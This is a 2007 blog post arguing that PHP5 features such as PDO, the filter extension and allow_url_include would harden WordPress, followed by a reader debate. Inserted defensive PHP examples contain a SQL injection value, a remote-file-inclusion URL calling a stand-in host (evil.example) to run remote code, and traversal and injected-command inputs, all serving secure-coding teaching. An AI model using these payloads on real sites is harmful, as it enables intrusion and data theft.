What Matt Mullenweg doesn’t know about PHP5, and how it hurts him and his users

Matt Mullenweg, the dude behind Wordpress, has posted something of a rant about PHP5 in light of the upcoming drop of PHP4 support:

None of the most requested features for WordPress would be any easier (or harder) if they were written for PHP 4 or 5 or Python. They’d just be different. The hard part usually has little to do with the underlying server-side language.

Here’s a hint: don’t give the users what they say they want until you give them what they need, even if they don’t realize what that is. Here are some PHP5-only features that could be helping Wordpress users right now:

  • Parameterized SQL input to eliminate SQL injection attacks (security)
    Strictly enforcing the use of parameterized SQL input in Wordpress development would dramatically reduce, and in all likelihood eliminate, the possibility of SQL injection attacks against Wordpress. Using the PHP5-only PDO extension would allow this even with databases that don’t natively support prepared statements, since PDO emulates them on the client side. Two caveats a reviewer should hold the codebase to: placeholders bind values only, so table and column names and ORDER BY clauses still have to come from an allow list, and the protection only holds if every query goes through it, which is why it has to be enforced rather than merely encouraged.

  • Filter extension to validate untrusted input and cut down XSS and injection bugs (security)
    The PHP5-only filter extension (bundled with the core as of 5.2) adds fast, built-in input validation and sanitizing functions (filter_var, filter_input). Given the history of problems Wordpress has with handling user input properly, enforcing the use of this or another solid input filtering system would surely reduce the number of input handling errors in the WP codebase. It is not a complete answer on its own: XSS still needs context-specific escaping on output, and CSRF needs per-request tokens, which no input filter provides.

  • Turning off remote file inclusion by default (security)
    Remote file inclusion vulnerabilities account for approximately 40% of all security issues with PHP-based applications. The allow_url_include configuration setting, added in PHP 5.2.0, defaults to Off and blocks include/require of URL wrappers without touching allow_url_fopen, so fopen() and file_get_contents() on remote resources keep working. Before 5.2 the only switch was allow_url_fopen, which most hosts left on because turning it off broke legitimate code. The setting does nothing about local file inclusion through the same code path, so the include target still has to be validated.

  • Prepared statement/transaction support in PDO and MySQLi (performance)
    Prepared statements not only provide the benefits of parameterized input mentioned above; significant performance gains can be had from them when a statement is prepared once and executed many times, because the server parses and plans it only once. AFAIK, it’s not possible to support these features with MySQL under PHP4: the old mysql extension has no prepared statement API, and both MySQLi and PDO are PHP5-only.

  • Improved OOP features and support (code quality, extensibility)
    This would aid developers first, and users in turn, by making a large project like Wordpress easier to maintain (in my opinion, and based on anecdotal evidence). Code reuse improves, quality goes up, and hackish workarounds like global variables become unnecessary.

    I’ve hacked the guts of Wordpress and written numerous plugins, and I’m still shocked at what a garbled mess the WP codebase is, and how much easier it is to write extensions for content management systems that embrace OOP. Of course, OOP is very possible in PHP4, but PHP5 adds a number of features that make a significant difference in team development (public/private/protected properties and methods, for example).

    (A cynic might suggest that one reason to not clean up the WP architecture is because that would break backwards compatibility with the extensive library of plugins that has a lot to do with Wordpress’ success. There would be some irony in that, no?)
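An added example for the first two points above, written for this edit and not taken from WordPress or from the post: the string-spliced query that SQL injection relies on, next to the same query with bound parameters, run against an in-memory SQLite database so it works offline. The posts table, its two rows, the attacker's slug value and the order_by_column() helper are all constructed for the demonstration.

```php
<?php
// Added example, not code from WordPress or from this post: a query built
// by string interpolation beside the same query with bound parameters.
// Uses PDO's SQLite driver with an in-memory database so it runs offline;
// the posts table and its two rows are constructed for the demo.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, slug TEXT, status TEXT)');
$db->exec("INSERT INTO posts (slug, status) VALUES ('hello-world', 'publish')");
$db->exec("INSERT INTO posts (slug, status) VALUES ('secret-draft', 'draft')");

// Vulnerable: the request value becomes part of the SQL text, so a quote
// in it rewrites the WHERE clause. AND binds tighter than OR, so every row
// matches and the unpublished draft leaks.
function find_post_unsafe(PDO $db, $slug)
{
    $sql = "SELECT slug FROM posts WHERE status = 'publish' AND slug = '$slug'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Parameterized: the statement's grammar is fixed at prepare() time and the
// value is bound separately, so it can only be compared, never parsed.
// Reusing one prepared handle across many execute() calls is also where the
// performance gain mentioned in the post comes from, on drivers that do
// server-side prepares (PDO_MySQL emulates them on the client unless
// PDO::ATTR_EMULATE_PREPARES is set to false).
function find_post_safe(PDO $db, $slug)
{
    $stmt = $db->prepare('SELECT slug FROM posts WHERE status = :status AND slug = :slug');
    $stmt->execute(array(':status' => 'publish', ':slug' => $slug));
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Placeholders bind values only. Identifiers and keywords (table names,
// ORDER BY columns, ASC/DESC) cannot be bound; those must come from an
// allow list, never from the request.
function order_by_column($requested)
{
    $allowed = array('id', 'slug');
    return in_array($requested, $allowed, true) ? $requested : 'id';
}

$slug = "x' OR '1'='1"; // simulated ?slug= value from an attacker
var_dump(find_post_unsafe($db, $slug)); // leaks the draft row
var_dump(find_post_safe($db, $slug));   // no post has that literal slug
var_dump(order_by_column('id; DROP TABLE posts')); // falls back to 'id'
```

Run it with the php CLI on any build that has pdo_sqlite. The unsafe function returns both rows for the crafted slug, including the draft; the parameterized one returns none, because the value is compared literally. For the performance point in the post, prepare the statement once outside the loop and call execute() per row.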
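An added example for the filter extension point, written for this edit and not taken from WordPress or from the post: validating a handful of request fields with filter_var() and then escaping on output. The $request array is constructed to stand in for $_GET, and the field names and the render_search_box() helper are assumptions made for the demonstration.

```php
<?php
// Added example, not code from WordPress or from this post: validating
// request fields with the PHP 5.2 filter extension, then escaping on
// output. $request is constructed here to stand in for $_GET.
$request = array(
    'p'    => '42abc',                     // post id: must be a positive integer
    'page' => '-3',                        // page number: must be >= 1
    'site' => 'javascript:alert(1)',       // commenter URL: must be http(s)
    's'    => '<script>alert(1)</script>', // search term: free text
);

// Validation: each field has one expected type and range. A value that does
// not fit is rejected (false) or replaced by a safe default, rather than
// "cleaned up" and then trusted.
function validate_request(array $r)
{
    $out = array();

    // '42abc' is not an integer: FILTER_VALIDATE_INT returns false, whereas
    // (int) '42abc' silently yields 42.
    $out['p'] = isset($r['p'])
        ? filter_var($r['p'], FILTER_VALIDATE_INT, array('options' => array('min_range' => 1)))
        : false;

    // Out-of-range page numbers fall back to 1 via the 'default' option.
    $out['page'] = isset($r['page'])
        ? filter_var($r['page'], FILTER_VALIDATE_INT,
                     array('options' => array('min_range' => 1, 'default' => 1)))
        : 1;

    // FILTER_VALIDATE_URL checks syntax only; pin the scheme as well, or a
    // javascript: or data: URL that happens to parse is accepted as "valid".
    $site = isset($r['site']) ? filter_var($r['site'], FILTER_VALIDATE_URL) : false;
    if ($site !== false && !in_array(parse_url($site, PHP_URL_SCHEME), array('http', 'https'), true)) {
        $site = false;
    }
    $out['site'] = $site;

    // Free text cannot be validated away; keep it intact and escape on output.
    $out['s'] = isset($r['s']) ? (string) $r['s'] : '';

    return $out;
}

// Output: escaping is per context. htmlspecialchars() with ENT_QUOTES is
// right for HTML text and attribute values; it is not right for a URL,
// a JavaScript string or a SQL literal, each of which needs its own encoder.
function render_search_box(array $v)
{
    return '<input type="text" name="s" value="'
         . htmlspecialchars($v['s'], ENT_QUOTES, 'UTF-8') . '">';
}

$v = validate_request($request);
$rejected = array();
foreach (array('p', 'site') as $field) {
    if ($v[$field] === false) {
        $rejected[] = $field; // treat as a bad request; do not guess a value
    }
}
var_dump($v, $rejected);
echo render_search_box($v), "\n";
```

The useful habit this shows is separating the two jobs: validation at the boundary turns a request into typed values or a rejection, and escaping at output handles the free-text fields that cannot be validated. Neither job addresses CSRF; that needs a per-request token checked on state-changing actions.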
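An added example for the remote file inclusion point, written for this edit and not taken from WordPress or from the post: the include pattern RFI attacks target, an allow-listed replacement, and a startup check of the php.ini setting the post mentions. The pages/ directory, its two files and the function names are assumptions made for the demonstration.

```php
<?php
// Added example, not code from WordPress or from this post: the include
// pattern that remote file inclusion attacks target, an allow-listed
// replacement, and a startup check of allow_url_include. The pages/
// directory and the two files in it are assumed to exist.

// Vulnerable. With allow_url_include=On (or on PHP < 5.2.0, where only
// allow_url_fopen gated this), ?page=http://evil.example/shell.txt? fetches
// and executes remote code; the appended '.php' lands in the URL's query
// string and changes nothing (and before PHP 5.3.4 a %00 in the value
// truncated the path, discarding the suffix). Even with remote includes
// off this is still a local file inclusion bug (?page=../../uploads/x),
// so the ini setting is a backstop, not a fix.
function render_page_unsafe($page)
{
    include $page . '.php';
}

// Hardened: the request selects a key from a fixed map. No part of the
// filesystem path or URL is ever derived from user input.
function render_page_safe($page)
{
    $pages = array('home' => 'home.php', 'about' => 'about.php');
    if (!isset($pages[$page])) {
        return false; // caller answers with a 404
    }
    include dirname(__FILE__) . '/pages/' . $pages[$page];
    return true;
}

// Defence in depth: fail closed if the interpreter allows URL includes.
// allow_url_include (PHP 5.2.0+) defaults to Off and gates include/require
// of URL wrappers; allow_url_fopen defaults to On and only governs fopen(),
// file_get_contents() and similar, so leaving it on does not reopen RFI.
function remote_includes_disabled()
{
    return !filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

if (!remote_includes_disabled()) {
    trigger_error('allow_url_include is On; set "allow_url_include = Off" in php.ini', E_USER_ERROR);
}
var_dump(render_page_safe('../../etc/passwd')); // rejected: not a known key
```

The check at the bottom is the piece worth copying into an application's bootstrap: it costs nothing and turns a silently dangerous host configuration into a visible failure.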

I think this line from Matt’s post might be telling:

Even hosted PHP-powered services who have no shared host compatibility concerns like 30boxes, Digg, Flickr, and WordPress.com, have been slow to move and when they do it will probably be because of speed or security, not features.

The thing is, using PHP5-only features in WP would give it better speed and security right now. And especially in the case of security, Matt’s reliance on what users say they want is a critical error: users don’t ask about security until well after it has become a serious issue. Wordpress has one of the worst security records of any PHP application, so I’ll go out on a limb and say that it’s a problem now. Even if WP users aren’t talking about it, WP’s core dev team should have addressed this already.

I’ve said before that web app developers are the stewards of their users’ data. Our users need and expect us to anticipate and address their security. If we don’t do that, and simply base our actions on popular opinion, we’re being irresponsible.


On a basically unrelated note, it really is disappointing to see Matt sink to ad-hominem attacks when making his argument:

In 2007, [the PHP site] still doesn’t have obvious permalinks. They do have a RSS 1.0 feed though, remember those?
Some app makers felt sorry for PHP 5 and decided to create the world’s ugliest advocacy site…

That’s bush league, Matt. Cut the elitism BS and stick to a proper, logically sound argument.

  • Joshua May
    http://www.notjosh.com/blog
    07/15/2007 10:59:58 PM

    yeah, I agree. It’s just a cat-fight, though. Not everyone would be happy, and that was obvious, but it’s kind of sad to see someone in that position reacting that way.

    That said, I completely understand where he’s coming from. But I still think it’s much better to embrace progress. Early adoption is key.

    Consider me still not a Wordpress user or advocate.

  • Ronald van den Heetkamp
    http://www.0x000000.com
    07/16/2007 05:21:41 AM

    I don’t agree with your arguments, and it’s almost like you are saying that everyone MUST comply with PHP5 fanboys.

    And if you talk about the security features, you still rely on the PHP5 backend, which hardly anyone inspects for flaws. Ever seen the PHP5 security buglist? It’s almost as large as PHP4 to PHP4.6 combined. More features, more stuff to attack, more unknown and potential holes.

    I praise the effort of PHP5 but I don’t need it, hence I could get away free with using php3 if I wanted and still be secure, cause it still depends on how you handle data as a programmer. No short cuts while relying on the PHP5 backend to solve your problems. It can supplement, but it poses a danger if one trusts it blindly.

    And the Apache 1.337 => Apache 2.00 discussion is a wise lesson, newer doesn’t mean more secure. It may be easier to do stuff than before, but it isn’t “more” secure.

  • Matt
    http://photomatt.net/
    07/16/2007 05:51:59 AM

    Thanks for the thoughtful entry! This is just the kind of thing I was hoping people would post. Just a few notes:

    1. We now have parameterized SQL in core.
    2. We’re not concerned with databases besides MySQL.
    3. We have fine HTML filtering with KSES. The filtering has never been a problem, it’s just places where it’s been not applied.
    4. While it would be nice to get a little more performance by using prepared statements, SQL is generally less than 5% of execution time.
    5. OOP - In our experience strict OO can be fairly intimidating to casual coders, who are the people who have created the countless plugins for WP that make it as popular as it is today and, as you note, we’d like to maintain backward compatibility for. However internal APIs and code have embraced OO methods where appropriate.

    While significant efforts have been made in auditing WP’s code, and we will continue to do so, I’m operating under the assumption that someday someone will find something, so our focus is on notification and ease of upgrading. Since people are using WP as a platform we need to make it upgrade like one.

  • Patrick Lee
    http://www.alimadzi.com
    07/16/2007 10:11:05 PM

    I’m on the fence with this one. While I love all the advantages that PHP 5.2 has over PHP 4.4, I can understand Matt’s argument about the legions of plugin developers who don’t grok OOP. However, Josh has some great points about enforcing security by default using PDO, Filter, and other features only available in PHP 5+.

    The great thing about open source software is that people who are not happy with the status quo have the freedom to fork the project and go their own way. There’s nothing to stop somebody from creating “wOOrdpress”. Get it? OO?

    Would this be a good thing for the Wordpress community as a whole? Hard to say, but my guess is probably not. Will the whole GoPHP5 movement really result in a mass upgrade? I hope so, but I don’t know that either. I just know that Wordpress is arguably the most popular and most extensible PHP app in existence today and we should probably think twice before we really rock the boat.

    Does something need to be done to finally squelch the lingering code issues that WP has? Absolutely. Is a complete rewrite using PHP5-only features the answer we’re looking for? Magic 8 Ball says… “Ask again later.”

  • Patrick Lee
    http://www.alimadzi.com
    07/16/2007 10:12:08 PM

    Sorry, where I said Josh in the first paragraph, I should have said Ed. Oops.

  • Nate Klaiber
    http://nateklaiber.com
    07/17/2007 09:25:49 AM

    Just as there are developers who don’t “get” PHP5 and its OO features, there are other developers who don’t want to traverse through a procedural mess. I am one of those people. Sure, I would love to extend a few things about my WP installation, but the codebase beneath is simply functions strung together, PHP/HTML intermixed at many different levels.

    So because there are hack developers who know little PHP and can work with the procedural mess, that is what keeps you from moving to a cleaner OO system?

    I hope as someone else pointed out, that someone will extend it to be OO. For now, I have found the best option is to simply move away from WordPress as it can’t do the things I need my site to do (without me hacking the procedural mess, no thanks). This doesn’t make Wordpress bad, I am just on the other side of the fence in that I prefer clean code and standards within.

    I think the real issue is that people try to stretch Wordpress into something it isn’t. Again, nothing against WP - it is a great blogging system. Some people try and make it do things it simply wasn’t created for.

    Then again, maybe I should upgrade and check out the recent changes that Matt listed above before I speak any more.

  • Sean
    07/17/2007 07:52:04 PM

    Like you, I’ve spent a lot of time digging through the core WordPress code, and it is an ungodly, unmanageable mess.

    I can only roll my eyes when I read Matt’s “expert” opinions on PHP.

  • Matt
    http://photomatt.net/
    07/17/2007 08:01:40 PM

    Then write a better app, and make it popular.

  • Jacob Santos
    07/17/2007 10:30:37 PM

    Um, procedural code isn’t a bad thing. The WordPress code is very easy to extend and that in my opinion is worth more than anything. I believe more applications should duplicate the plugin (hook, action, event) model of WordPress.

    Unless you work with WordPress and other OO applications, you can’t really appreciate the ease. Also, reading WordPress code is a lot cleaner than some other applications.

    Sometime, look at the horror that is Coppermine and you’ll be impressed by that of WordPress. However, the Gallery 2 code is solid.

    I actually started an OO fork of WordPress yesterday, but I’m not sure how far I’ll get with it. I’ll probably abandon it after a couple of weeks, after I realize it is a waste of time and the WordPress code is good enough procedural.

  • funkatron
    http://funkatron.com
    07/17/2007 11:28:26 PM

    @Ronald van den Heetkamp: I am not implying anything I did not say.

    @sean: I think Matt’s a smart guy, and his opinions are as valid as any. I happen to disagree with him in this case.

    @Matt: Popularity has many potential fathers, and quality is all too infrequently one of them.

  • Thomas Lee
    http://www.vector-seven.com
    07/17/2007 11:30:14 PM

    On the topic of parameterized queries and prepared statements with PDO, you might want to check out the successor to PEAR DB - MDB2:

    http://pear.php.net/MDB2

    You’ll likely want to load the “Extended” module too:

    require_once 'MDB2.php';            // PEAR MDB2 must be on the include_path
    $dsn = 'mysql://user:pass@localhost/dbname'; // MDB2 DSN string for your database

    $db =& MDB2::connect($dsn);
    $db->setFetchMode(MDB2_FETCHMODE_ASSOC);
    $db->loadModule('Extended', NULL, FALSE);

    MDB2 works in PHP4 too if you’re feeling sinful. :)

  • funkatron
    http://funkatron.com
    07/17/2007 11:34:12 PM

    @Thomas: Thanks for the info!

  • Sean
    07/18/2007 12:05:34 AM

    @funkatron - WordPress wouldn’t dominate the blogging software “market” if Matt wasn’t a smart guy. We all know he’s smart.

    Another intelligent man who used his smarts to dominate a market is Bill Gates. However Bill’s poor coding skills are legendary. The success of Windows is a testament to his marketing skills, not his coding abilities.

    The same holds true for Matt. The WordPress code is proof enough that he’s not the greatest programmer. It breaks dozens of fundamental coding practices — Poor abstraction, reusability, no inline documentation, etc. If you don’t even understand and use the fundamentals of programming, how can you say with authority that PHP4 is just fine, and PHP5 has nothing to offer?

    So yes, he’s a smart guy. He’s been a great marketer. But he’s no programmer, which is why I couldn’t care less what he has to say on the subject.

  • Alex
    http://alexking.org
    07/18/2007 03:08:40 AM

    I think there’s a fundamental point being missed here. I’ve watched Matt work for several years and argued against him on numerous points during that time. While I don’t always agree with him or his arguments, like most smart people Matt is willing to be convinced by good arguments on the other side.

    The real issue that I see is that for many PHP5 is still lacking an “OMG I have to upgrade right now because I want that” feature. That will drive upgrades much more than any pro-PHP5 campaigns, etc.

    You may not agree with Matt’s opinions on this topic, but I can’t imagine it’s the first time you’ve heard them. Think about that for a little bit. Certainly we can all agree that compelling features make for quicker adoption of upgrades.

  • Sean
    07/18/2007 03:49:41 AM

    @Alex - I think this is where we start getting into a cylindrical stale-mate. Web hosts aren’t looking for “OMG” features. They’re only looking for demand to upgrade.

    There’s no demand on web hosts to upgrade when insanely huge, popular applications like WP still work with dusty ol’ PHP 4.3.

    Matt isn’t going to push forward, partially because web hosts still support 4.3, so there’s no demand for him to leave PHP4 behind.

    And around and around we go. Web hosts and application developers are both staring at each other, waiting for the other one to make the first move.

    So what’s the other reason Matt won’t leave PHP4 behind? It’s possibly because he doesn’t think PHP5 has any “OMG” features, and that’s what funkatron’s post is all about.

    He’s trying to point out that PHP5 has some serious OMG features that could benefit WP in so many ways. But Matt either doesn’t understand, or doesn’t care.

    All the code Matt creates (or code written by others that he manages) is written in PHP4 (that I know of), so I have to wonder if he’s even tried using PHP5 in a serious real world way. You can’t say you don’t like something, or say you don’t see the value of it until you’ve tried it, right?

  • funkatron
    http://funkatron.com
    07/18/2007 11:49:10 AM

    @alex: “Certainly we can all agree that compelling features make for quicker adoption of upgrades.”

    True, yes, but… let’s look at something matt said in his post:

    “What was it that made PHP 4 so successful? What are we doing to emphasize those strengths? Why wasn’t PHP 5 compelling to that same audience? “

    I think a lot of what made PHP4 so successful was simply timing, good integration with Apache, and a shallow learning curve. All of these things are also present in PHP3. A couple features in PHP4 aided things a bit, like native sessions (although pure PHP solutions existed, which Matt seems to prefer), but I don’t think it’s the case that particular PHP4-only features dramatically increased adoption. PHP4 had a fully rewritten engine, but feature-wise 4 was very much an evolutionary change, just like PHP5 and just like PHP6 seems to be. Things that have been present in all PHP versions since 3 were, imho, what led to PHP’s dominance.

    The difference between the jump from 3 to 4 and 4 to 5 is that PHP has a far, far larger audience to deal with, and a MUCH larger group of applications which may have bc issues (although I think those are fairly minor in most cases). I suspect that is why adoption of PHP5 is slower, and not because of anything inherent to PHP4 that’s not there in PHP5.

  • Michal Migurski
    http://mike.teczno.com
    07/19/2007 12:09:27 PM

    Use or non-use of OOP is unrelated to the garbled mess inside WP (it makes me shudder, too). If anything, bad OOP is significantly harder to follow than bad functional/procedural code, because it adds a full extra dimension of inheritance to the what-the-heck-is-this-program-doing search space.

    The other arguments offered in this post boil down to saving users from themselves: if we could just force everyone to move to a language version that limited their actions in some crucial way (enforced prepared statements, input filtering), there would be no security problems. Aside from being unrealistic, you deny the ease of use and approach that made PHP4 and WordPress catch on as strongly as they did. This is Matt’s core point: messiness supports and allows popularity.

  • Jeff Eaton
    http://jeff.viapositiva.net
    07/19/2007 01:46:28 PM

    “And around and around we go. Web hosts and application developers are both staring at each other, waiting for the other one to make the first move.” …And that’s precisely the reason a number of OSS projects formed the GoPHP5 group. To collectively take the first step and get the ball rolling with hosting, application, and other upgrades. It’s baffled me that some people talk about that move as a ‘political move,’ or ‘playing power games with users,’ and so on. It’s all about breaking the stalemate that locks apps out of useful new work that the PHP development team is producing.

    On a completely unrelated side note, Ed, I was very amused to see your name pop up in my news. I was a big Cult of Jester fan back in the day. ;)

  • funkatron
    http://funkatron.com
    07/19/2007 01:46:41 PM

    @michal

    Agreed, badly organized code is a challenge to follow, no matter if it’s procedural or no. I do tend to find OOP easier to grok out of the box, but that may just be me.

    I think you mis-characterize my post, though. I’m pointing out features that PHP5 provides which would, I believe, improve Wordpress. When I do talk about enforcement of certain coding styles, those are things that would be done on a project level. The context is the Wordpress project, not all PHP development.

    I’d have to see a much more fleshed-out argument that “messiness” supports and allows popularity on a per-project level. I do think that PHP’s popularity owes a lot, not so much to being messy, but to being accessible (maybe we mean the same thing, though). However, I don’t think the feature set changes between 3 and 4 were any more significant than from 4 to 5, and I don’t believe they contributed significantly to PHP’s rise in popularity. I’d certainly like to hear arguments to the contrary, though.

  • funkatron
    http://funkatron.com
    07/19/2007 02:07:39 PM

    @Jeff: rock on! I’m still doing music, and you can buy the old COJ stuff online and directly from me.

    Check out http://cultofjester.com

  • 0x000000
    http://www.0x000000.com
    07/19/2007 03:33:40 PM

    @funkatron

    I sure applaud the new features, but I also say it isn’t smart to rely on it solely. I would rather see a very stripped version of PHP, cleaned of all those functions which all do more or less the same.

    I started OO scripting in 2004 and in the end I dropped it because it didn’t save me any time, and it did not make my apps run any better. No one has ever convinced me of the benefits after that because I still think it’s a useless concept.

    For what it’s worth; My scripting mantra is simple, I don’t make it anymore complex than it already is.

  • jharr
    07/19/2007 04:19:28 PM

    If PHP5 were so compelling people would be using it. If its ‘features’ need this much effort to expose/build-up/market then something is really missing, regardless of how valuable it may truly be to developers. Just because an initiative is open-source vs commercial doesn’t mean it won’t suffer the same pitfalls, marketing woes and customer push-back.

    I find humor in the fact that you dismiss Matt as an elitist in your post then go on to support the opinion that PHP4’s popularity and appeal to less sophisticated developers make it a mess and play up the OOP snobbery. Glass houses and whatnot.

  • Nate Klaiber
    http://www.nateklaiber.com
    07/19/2007 04:33:20 PM

    @jharr OOP snobbery? That has to be one of the funniest things I have heard all day long.

  • funkatron
    http://funkatron.com
    07/19/2007 04:55:57 PM

    @jharr:”If PHP5 were so compelling people would be using it.”

    I think you’re oversimplifying the issue and underestimating the challenge of dealing with an enormous user base in an open-source project. Indeed, I’m not even trying to argue that everyone should be using PHP5 — I do, and I enjoy many of its features, but anyone can feel free to continue to use PHP4 if they wish. I simply was addressing the idea that PHP5 had little to offer Wordpress — I don’t feel that’s true, and made a post about that. You’re inferring things that aren’t there.

    “I find humor in the fact that you dismiss Matt as an elitist in your post…”

    I did no such thing. If I were to dismiss him, I wouldn’t have addressed his points in detail. I did, however, point out that he could make his argument without ad-hominem attacks. Matt’s an intelligent guy, and he doesn’t need to do that.

  • funkatron
    http://funkatron.com
    07/19/2007 05:03:50 PM

    @0x000000: OOP is certainly no magic bullet, and the gain (or loss) of productivity will likely vary dramatically from coder to coder, and from project to project. I do think that OOP has the potential to help a lot in larger projects with several developers.

  • Sean
    07/19/2007 11:01:11 PM

    I’m really enjoying this thread, but I hope it doesn’t turn into a OOP vs. Procedure war. That’s been raging on the net for a decade or more, and it’s pointless to start it up here.

    “If PHP5 were so compelling people would be using it.”

    Lots of PHP developers would love to use PHP5 exclusively. I talk to them all the time. And many that do start using PHP5 never want to go back to PHP4.

    But they can’t use PHP5 because it’s still not widely supported among web hosts. If you want wide adoption of your application, you need to write it for PHP4, because many web hosts still aren’t using PHP5 yet.

    The features are there, and developers do want to use them. I disagree fully with your point, and agree with funkatron by saying you’re oversimplifying the issue.

    On a side note, I’d use PHP5 for SimpleXML alone.

  • Richard Davey
    http://www.corephp.co.uk
    07/20/2007 12:13:09 PM

    I’m with Sean on this one - the problem for the vast majority of developers out there isn’t that they don’t want to move to PHP5, it is that they cannot because their host doesn’t support it.

    When the PHP developers broke all chance web hosts had of making a painless upgrade from 4 to 5, they broke with it all chance of quick adoption. Sadly I believe ultimately the blame must lay with them and no-one else. It was an internals design decision that caused this mess beyond anything else.

    If they do the same from PHP 5 to 6 then quite frankly most of us can kiss our beloved language goodbye within a very short period of time (which, as a full-time professional PHP developer, scares me greatly).

  • 0x000000
    http://www.0x000000.com
    07/21/2007 08:04:39 AM

    @funkatron

    Yep, in larger projects with multiple programmers OOP is a blessing. That is quite true. But like above stated, a new OOP vs Procedure war is a bit too much and I won’t join it. ^^

    If anything, my point was actually that PHP5 doesn’t make it any more secure per se, it’s not like: I install PHP5 and I’m safe. That is giving developers the wrong example.

    Most PHP scripters think they are safe, I guess it’s a good start by changing attitudes of PHP scripters by convincing them it’s okay to upgrade to PHP5, but it doesn’t mean you can sit back and relax now.

  • Ray
    07/23/2007 02:10:21 AM

    Finally, someone else sees that he’s an elitist, narcissistic prick.

  • funkatron
    http://funkatron.com
    07/23/2007 11:23:06 AM

    @0x000000 I hope no one gets the impression I think PHP5 is somehow a magic security bullet. The context of other posts on this blog and my projects would hopefully indicate otherwise.

  • James Asher
    http://17thdegree.com
    07/25/2007 12:11:14 AM

    Maybe it’s just me, but how is it that webhosts don’t offer php5? I’ve been with Dreamhost for years now and they’ve had a PHP5 offering since 2005.

  • Sean
    07/25/2007 12:45:31 AM

    @James Asher - I agree. It’s possible that in some circumstances it’s a matter of stability, and in others it’s just laziness.

  • Richard Davey
    http://www.corephp.co.uk
    07/25/2007 04:15:00 AM

    And we all know how reliable Dreamhost are ;)

    Sarcasm aside I don’t believe it’s as simple as that. In order to offer both flavours you have to have one of them running as CGI, or split them out across different servers, both of which are quite messy solutions. If you host a number of high traffic PHP 4 sites and then swap them all to the CGI version just so you can get PHP 5 on there, you are going to notice the hit on your servers.

    If you are a decently sized host then you replicate this across thousands of servers, it is no trivial matter.

    If PHP 6 will not work with PHP 5 (which I highly suspect) then web hosts are shit-out of luck - at the moment they can at least juggle 4 and 5 via CGI and Module, but which one gets the elbow when 6 comes along?

  • funkatron
    http://funkatron.com
    07/25/2007 08:39:40 AM

    @Richard

    FWIW, I have generally been happy with Dreamhost, and despite the fact that they’ve had some pretty dramatic issues over the last year, I think that they do a lot comparatively to provide a more secure PHP environment than most large hosts in their cost range.

    I do think that the PHP group would be well-advised to consult a lot more with large web hosting teams on issues like the ones you’ve highlighted.

  • funkatron
    http://funkatron.com
    07/25/2007 08:41:17 AM

    Although I should say that I don’t use DH as my primary hosting anymore.

  • Owen
    http://asymptomatic.net
    07/25/2007 08:46:25 AM

    It comes as no surprise to me that WordPress isn’t interested in these modern coding techniques, after seeing - in only one of many examples - the revision process to the Widget plugin, which is now just a shadow of its formerly entirely OO self. It’s simultaneously ironic that they’re convinced that they’re user-centered in design when the contributing developers (core and plugin) that made the product popular are the users they’re alienating by dragging their feet with their dedication to PHP4. WordPress, for reasons I haven’t been able to understand, has the power to affect positive change, but doesn’t bother.

    For anyone interested in a PHP5-based, object-oriented project - to follow through on Matt’s brazen yet tired refrain of “if you think you can do better” - please check out Habari (http://habariproject.org) where we’ve got a bunch of developers (including many prior WP contributors) working within a truly open-source contribution model where contributor opinion on the technology used actually factors into the decision-making.